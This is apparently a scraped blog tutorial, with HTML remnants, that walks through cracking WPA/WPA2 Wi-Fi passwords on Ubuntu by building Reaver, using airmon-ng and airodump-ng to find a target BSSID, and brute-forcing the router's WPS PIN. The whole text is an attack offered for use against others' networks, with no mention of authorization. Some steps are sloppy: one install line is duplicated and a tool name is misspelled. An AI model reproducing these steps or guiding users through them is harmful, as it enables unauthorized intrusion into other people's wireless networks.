Hey, folks today we are gonna learn how to hack a wifi network using Ubuntu OS. With the help of this method, you can hack wifi with WPA\/WPA2 secured. So this method work on almost any Linux distro. You just have to download Reaver (Its download link will be last of this post )<\/p>\n

Follow the steps below:-<\/p>\n

1. First, download Reaver and put in a specific folder<\/p>\n

2. Then, open Terminal and type:<\/p>\n

sudo-s<\/p><\/blockquote>\n

Then, type your password.
\n3. In terminal, type:<\/p>\n

tar xvfz reaver-1.4.tar.gz<\/p><\/blockquote>\n

4. Install dependencies<\/p>\n

sudo apt-get install libsqlite3-dev<\/p><\/blockquote>\n

then, type:<\/p>\n

sudo apt-get install libsqlite3-dev<\/p><\/blockquote>\n

5. Enter the folder by typing<\/p>\n

cd reaver-1.4\/src<\/p><\/blockquote>\n

6. Then, type:<\/p>\n

.\/configure<\/p><\/blockquote>\n

7. Then, type:<\/p>\n

make<\/p><\/blockquote>\n

8) Then, type:<\/p>\n

make install<\/p><\/blockquote>\n

To test if Reaver have been successfully installed, Open a Terminal and Type \u2018reaver\u2019 and hit enter, it should list all Reaver\u2019s sub commands.<\/em><\/p>\n

After installing Reaver, we can\u00a0hack\u00a0wireless passwords with WPA\/WPA2 Encryption.<\/p>\n

Requirements:<\/strong>
\nInstall aircrack-ng by typing<\/p>\n

sudo apt-get install aircrack-ng<\/p><\/blockquote>\n

Airodump-ng \/ Airmon-ng commands<\/p>\n

Reaver 1.4 (We’ve already installed it above.)<\/p>\n

Steps<\/strong><\/p>\n

1.\u00a0We need to have the wireless BSSID (Mac address) so we use airodump-ng. Open a terminal and Type:<\/p>\n

airmon-ng start wlan0<\/p><\/blockquote>\n

Type<\/p>\n

airodump-ng mon0<\/p><\/blockquote>\n

It will list the available wireless passwords, now copy the BSSID of the Access Point ( e.g :\u00a000:11:28:32:49:55<\/em>\u00a0)
\n2.\u00a0To start the attack, type:<\/p>\n

reaver -i mon0 -b 00:11:28:32:49:55<\/p><\/blockquote>\n

Now, it will start brute-forcing the PIN number of the WPS vulnerability, and it will show you the WPA\/WPA2 Password at the end of the Crack.
\nNote: You can use\u00a0walsh -i mon0<\/em>\u00a0to scan for vulnerable Access Points.<\/p>\n
